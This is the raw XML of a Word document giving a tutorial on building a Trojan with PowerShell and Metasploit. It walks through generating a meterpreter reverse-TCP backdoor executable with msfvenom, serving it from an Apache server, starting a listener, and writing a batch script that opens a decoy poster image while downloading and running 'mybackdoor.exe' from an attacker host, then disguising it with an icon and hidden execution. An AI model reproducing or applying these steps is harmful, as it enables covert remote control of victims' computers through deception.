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79DB" w14:textId="33247A70" w:rsidR="001C0719" w:rsidRDefault="00C61FA7" w:rsidP="000137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37C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">How to create a </w:t>
      </w:r>
      <w:r w:rsidR="000137C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Trojan</w:t>
      </w:r>
      <w:r w:rsidRPr="000137C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> using PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1979E29F" w14:textId="1D82327D" w:rsidR="000137C1" w:rsidRPr="000137C1" w:rsidRDefault="000137C1" w:rsidP="000137C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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Establish a backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBA4635" w14:textId="5216010E" w:rsidR="00C61FA7" w:rsidRDefault="00172F91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00172F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a reverse TCP connection?</w:t>
      </w:r>
      <w:r w:rsidRPr="00172F9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72F91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00172F91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>t requires the attacker to set up a listener first on his box, the target machine acts as a client connecting to that listener, and then finally the attacker receives the shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31336030" w14:textId="53E7CBC9" w:rsidR="00172F91" w:rsidRDefault="00172F91">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="hgkelc"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00172F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Meterpreter?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A </w:t>
      </w:r>
      <w:r w:rsidRPr="00172F91">
        <w:rPr>
          <w:rStyle w:val="hgkelc"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Metasploit attack payload that provides an interactive shell to the attacker from which to explore the target machine and execute code. Meterpreter is deployed using in-memory DLL injection. As a result, Meterpreter resides entirely in memory and writes nothing to disk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E81B8C1" w14:textId="15A9CB3E" w:rsidR="00172F91" w:rsidRDefault="00172F91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00172F91">
        <w:rPr>
          <w:rStyle w:val="hgkelc"/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What is a payload?</w:t>
      </w:r>
      <w:r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172F91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A payload in Metasploit refers to an exploit module.</w:t>
      </w:r>
      <w:r w:rsidRPr="00172F91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> I</w:t>
      </w:r>
      <w:r w:rsidRPr="00172F91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">n simple terms, </w:t>
      </w:r>
      <w:r w:rsidRPr="00172F91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>it is a</w:t>
      </w:r>
      <w:r w:rsidRPr="00172F91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> simple script that the hackers utilize to interact with a hacked system. Using payloads, they can transfer data to a victim system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE6B6EE" w14:textId="770094E1" w:rsidR="00172F91" w:rsidRPr="00172F91" w:rsidRDefault="00172F91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00172F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an exploit?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F91">
        <w:rPr>
          <w:rStyle w:val="hgkelc"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>An exploit executes a sequence of commands that target a specific vulnerability found in a system or application to provide the attacker with access to the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05053CE1" w14:textId="07AD00DD" w:rsidR="00CE46A7" w:rsidRPr="000137C1" w:rsidRDefault="00CE4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7C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Step 1: Create a backdoor for your Trojan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392671A8" w14:textId="77777777" w:rsidR="000137C1" w:rsidRDefault="00CE46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Start your Kali machine and in the terminal type </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1306D3DD" w14:textId="2525846B" w:rsidR="00CE46A7" w:rsidRPr="00C21826" w:rsidRDefault="00CE46A7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msfvenom -p windows/meterpreter/reverce_tcp LHOST=&lt;IP of your kali machine&gt; LPORT=&lt;choose an open port&gt; -f exe -o &lt;name</w:t>
      </w:r>
      <w:r w:rsidR="000137C1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o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f</w:t>
      </w:r>
      <w:r w:rsidR="000137C1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t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he</w:t>
      </w:r>
      <w:r w:rsidR="000137C1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b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ackdoor &gt;.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B55C494" w14:textId="37C608C5" w:rsidR="00C21826" w:rsidRDefault="00C2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03BFE" wp14:editId="252FD9DF">
            <wp:extent cx="5760720" cy="59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952D2" w14:textId="71FDAC35" w:rsidR="000137C1" w:rsidRPr="000137C1" w:rsidRDefault="000137C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</w:p>
    <w:p w14:paraId="5D5714E4" w14:textId="24B38BCA" w:rsidR="00CE46A7" w:rsidRPr="000137C1" w:rsidRDefault="00CE46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-p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specifies the type of payload it is going to be used, in this case I used meterpreter, reverse TCP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1706880C" w14:textId="6B7C2E46" w:rsidR="00CE46A7" w:rsidRPr="000137C1" w:rsidRDefault="00CE46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LHOST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LPORT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specif</w:t>
      </w:r>
      <w:r w:rsidR="000137C1" w:rsidRPr="000137C1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your Kali IP address and open port that the backdoor is going to </w:t>
      </w:r>
      <w:r w:rsidR="000137C1"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forward </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C5E245" w14:textId="43C99907" w:rsidR="00CE46A7" w:rsidRPr="000137C1" w:rsidRDefault="00CE46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-f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defines the extension type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280070AB" w14:textId="217F06B5" w:rsidR="00CE46A7" w:rsidRPr="000137C1" w:rsidRDefault="00CE46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137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-o</w:t>
      </w:r>
      <w:r w:rsidRPr="000137C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> specifies the name of the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB46821" w14:textId="51A95715" w:rsidR="00CE46A7" w:rsidRPr="000137C1" w:rsidRDefault="00CE46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Next</w:t>
      </w:r>
      <w:r w:rsidR="000137C1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move the payload to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/var/www/html/</w:t>
      </w:r>
      <w:r w:rsidRPr="00C218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137C1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cd</w:t>
      </w:r>
      <w:r w:rsidRPr="000137C1"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5084539E" w14:textId="687E9299" w:rsidR="00CE46A7" w:rsidRPr="000137C1" w:rsidRDefault="00CE46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Now</w:t>
      </w:r>
      <w:r w:rsidR="000137C1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type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chmod +x &lt;name of your payload&gt;.exe</w:t>
      </w:r>
      <w:r w:rsidR="00E527AE" w:rsidRPr="000137C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in order to allow access to this file to all users </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6088576F" w14:textId="35ECFE93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Start the </w:t>
      </w:r>
      <w:r w:rsidR="000137C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="000137C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">pache server by typing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service apache2 start</w:t>
      </w:r>
      <w:r w:rsidRPr="00C218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31EBEAE8" w14:textId="084988E5" w:rsidR="00E527AE" w:rsidRPr="000137C1" w:rsidRDefault="00C2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764F8C" wp14:editId="106EDE0E">
            <wp:extent cx="576072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01AA" w14:textId="2324AE8D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Now you can download the payload on your Windows machine by typing in the browser the following URL </w:t>
      </w:r>
      <w:r w:rsidRPr="00C21826">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>http://&lt;kali IP address&gt;/&lt;payload  name&gt;.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4F02F5" w14:textId="10BE777C" w:rsidR="00CE46A7" w:rsidRPr="00C21826" w:rsidRDefault="00E527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26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Step 2: Start reverse TCP listening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B71C9B" w14:textId="737D1D15" w:rsidR="00CE46A7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In Kali type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C218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137C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>command and provide the password for kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D1B713" w14:textId="2B3B476A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Next</w:t>
      </w:r>
      <w:r w:rsidR="00C21826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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="79DE02BA" w14:textId="6FB4B560" w:rsidR="00E527AE" w:rsidRPr="000137C1" w:rsidRDefault="00C2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793BB" wp14:editId="6B928993">
            <wp:extent cx="5760720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5A36" w14:textId="77777777" w:rsidR="00C21826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Now</w:t>
      </w:r>
      <w:r w:rsidR="00C21826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type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use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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exploid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/multi/handler</w:t>
      </w:r>
      <w:r w:rsidRPr="000137C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> press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0137C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> followed by </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBBC91C" w14:textId="2E31E08B" w:rsidR="00E527AE" w:rsidRDefault="00E527AE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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 payload windows/meterpreter/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000137C1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0137C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> again</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7FFAC7" w14:textId="24A22C0B" w:rsidR="00C21826" w:rsidRPr="00C21826" w:rsidRDefault="00C2182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</w:p>
    <w:p w14:paraId="3B554B4E" w14:textId="2885C060" w:rsidR="00E527AE" w:rsidRPr="00C21826" w:rsidRDefault="00E527A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If you </w:t>
      </w:r>
      <w:r w:rsidR="00C21826" w:rsidRPr="00C21826">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>want,</w:t>
      </w:r>
      <w:r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you can type </w:t>
      </w:r>
      <w:r w:rsidRPr="00C21826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show options</w:t>
      </w:r>
      <w:r w:rsidRPr="00C21826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  <w:r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to look at the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C21826">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Module options</w:t>
      </w:r>
      <w:r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for the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6899C0" w14:textId="7C806654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Next</w:t>
      </w:r>
      <w:r w:rsidR="00C21826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you need to specify the IP address and port number that you want to listen to (they have to match the ones you used in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Pr="000137C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B75BDC" w14:textId="13283C47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Type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 LHOST &lt;kali IP address you specified in Step 1&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="000137C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and press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85511C2" w14:textId="6DFD16AB" w:rsidR="00E527AE" w:rsidRPr="000137C1" w:rsidRDefault="00E527AE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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Set LPORT &lt;port number you specified in Step 1&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C218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137C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">and press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15B8261" w14:textId="64E29787" w:rsidR="00E527AE" w:rsidRPr="000137C1" w:rsidRDefault="00857335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>Finally</w:t>
      </w:r>
      <w:r w:rsidR="00C21826">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="000137C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> type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exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="000137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69854" w14:textId="1A18E5F1" w:rsidR="00857335" w:rsidRPr="000137C1" w:rsidRDefault="00857335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Now you will see </w:t>
      </w:r>
      <w:r w:rsidRPr="00C21826">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[*] Started reverse TCP handler on &lt;IP&gt;: &lt;Port number&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480E25C4" w14:textId="54ECC9B9" w:rsidR="00CE46A7" w:rsidRPr="00C21826" w:rsidRDefault="008573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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The back door is set and waiting to establish connection. Do not close the terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B25123D" w14:textId="77777777" w:rsidR="00CE46A7" w:rsidRPr="000137C1" w:rsidRDefault="00CE46A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72C6F7E7" w14:textId="45AA5630" w:rsidR="00C61FA7" w:rsidRPr="00C21826" w:rsidRDefault="00C61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1826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857335" w:rsidRPr="00C2182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21826">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: Open Notepad and type the following command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056EE6CD" w14:textId="77777777" w:rsidR="00C21826" w:rsidRPr="00C21826" w:rsidRDefault="00C21826" w:rsidP="00C218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Powershell -Command "Invoke-WebRequest 'https://sm.ign.com/ign_sr/gallery/h/house-of-t/house-of-the-dragon-character-posters_75v2.jpg' -OutFile poster.jpg" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F0B286" w14:textId="0A98E965" w:rsidR="00C21826" w:rsidRPr="00C21826" w:rsidRDefault="00C21826" w:rsidP="00C21826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poster.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583034D5" w14:textId="20FCC9D5" w:rsidR="00C61FA7" w:rsidRPr="00C21826" w:rsidRDefault="00C61FA7" w:rsidP="00C61FA7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Powershell -Command "Invoke-WebRequest 'http://</w:t>
      </w:r>
      <w:r w:rsidR="00857335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192.168.0.39 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/mybackdoor.exe' </w:t>
      </w:r>
      <w:r w:rsid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-</w:t>
      </w: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OutFile mybackdoor.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526A4D51" w14:textId="19A1FF8E" w:rsidR="00C61FA7" w:rsidRDefault="00C61FA7" w:rsidP="00C61FA7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mybackdoor.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D5B3B7" w14:textId="0FAB1B20" w:rsidR="00774AE9" w:rsidRDefault="00774AE9" w:rsidP="00C61FA7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23C44F6" wp14:editId="0295159A">
            <wp:extent cx="6230112" cy="556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4161" cy="5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368A" w14:textId="092A2344" w:rsidR="00C21826" w:rsidRPr="00C21826" w:rsidRDefault="00C21826" w:rsidP="00C61FA7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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476AEB6" w14:textId="2C6A6606" w:rsidR="00C61FA7" w:rsidRDefault="00C61FA7" w:rsidP="00C61FA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The first two commands </w:t>
      </w:r>
      <w:r w:rsidR="00CE46A7" w:rsidRPr="00C21826">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>download and open an image from the internet that is used as a cover for the trojan. The 3</w:t>
      </w:r>
      <w:r w:rsidR="00CE46A7" w:rsidRPr="00C2182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rd</w:t>
      </w:r>
      <w:r w:rsidR="00CE46A7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and 4</w:t>
      </w:r>
      <w:r w:rsidR="00CE46A7" w:rsidRPr="00C21826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="00CE46A7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command download and run an .exe file that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was created in </w:t>
      </w:r>
      <w:r w:rsidR="00857335"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 1</w:t>
      </w:r>
      <w:r w:rsid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08D8CD0D" w14:textId="03F059B0" w:rsidR="00774AE9" w:rsidRPr="00774AE9" w:rsidRDefault="00774AE9" w:rsidP="00C61F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Invoke-WebRequest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command:</w:t>
      </w:r>
      <w:r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 in our case it uses and URL to directly download a file from the internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C02A1D" w14:textId="77777777" w:rsidR="00C21826" w:rsidRDefault="00C21826" w:rsidP="00C61FA7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s</w:t>
      </w:r>
      <w:r w:rsidR="00857335" w:rsidRPr="000137C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ave the file by giving it a </w:t>
      </w:r>
      <w:r w:rsidR="00857335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name</w:t>
      </w:r>
      <w:r w:rsidR="00857335" w:rsidRPr="00C2182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857335" w:rsidRPr="000137C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">and a file extension </w:t>
      </w:r>
      <w:r w:rsidR="00857335" w:rsidRPr="00C21826">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7BA66E" w14:textId="2C5F245E" w:rsidR="00857335" w:rsidRPr="000137C1" w:rsidRDefault="00C21826" w:rsidP="00C61FA7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r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br/>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidR="00857335"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57335"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857335"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857335" w:rsidRPr="00C218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file is a file that contains a number of commands that get automatically executed when the user double click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it. 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t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 files can only run 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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>system commands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 xml:space="preserve">, not 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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>PowerShell commands</w:t>
      </w:r>
      <w:r w:rsidR="00857335" w:rsidRPr="00C2182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857335" w:rsidRPr="000137C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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That is why the </w:t>
      </w:r>
      <w:r w:rsidR="00857335" w:rsidRPr="00774AE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Invoke-WebRequest</w:t>
      </w:r>
      <w:r w:rsidR="00857335" w:rsidRPr="00774AE9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system command has to be enclosed in a </w:t>
      </w:r>
      <w:r w:rsidR="00857335" w:rsidRPr="00774AE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Powershel-Command “”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 – it explicitly tells the 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cmd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 that this is actually a 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PowerShell command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r w:rsidR="00857335"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 a system command</w:t>
      </w:r>
      <w:r w:rsidR="00857335" w:rsidRPr="00774AE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ADFB4E2" w14:textId="0063645E" w:rsidR="00857335" w:rsidRDefault="00857335" w:rsidP="00C61F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Now </w:t>
      </w:r>
      <w:r w:rsidR="000137C1" w:rsidRPr="000137C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>in order to</w:t>
      </w:r>
      <w:r w:rsidR="00774AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> run this,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convert the </w:t>
      </w:r>
      <w:r w:rsidR="000137C1" w:rsidRPr="00774AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.bat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file to </w:t>
      </w:r>
      <w:r w:rsidR="000137C1" w:rsidRPr="00774AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>an executable</w:t>
      </w:r>
      <w:r w:rsidR="00774AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -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download a </w:t>
      </w:r>
      <w:r w:rsidR="000137C1" w:rsidRPr="00774AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.bat to .exe</w:t>
      </w:r>
      <w:r w:rsidR="000137C1" w:rsidRPr="00774AE9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0137C1" w:rsidRPr="00774AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>converter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. When you upload your bat file in the converter you can even put an icon to it and make it run invisibly so that when the user clicks on the </w:t>
      </w:r>
      <w:r w:rsidR="00774AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">evil </w:t>
      </w:r>
      <w:r w:rsidR="000137C1" w:rsidRPr="000137C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidR="00774AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,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the cmd</w:t>
      </w:r>
      <w:r w:rsidR="00774AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
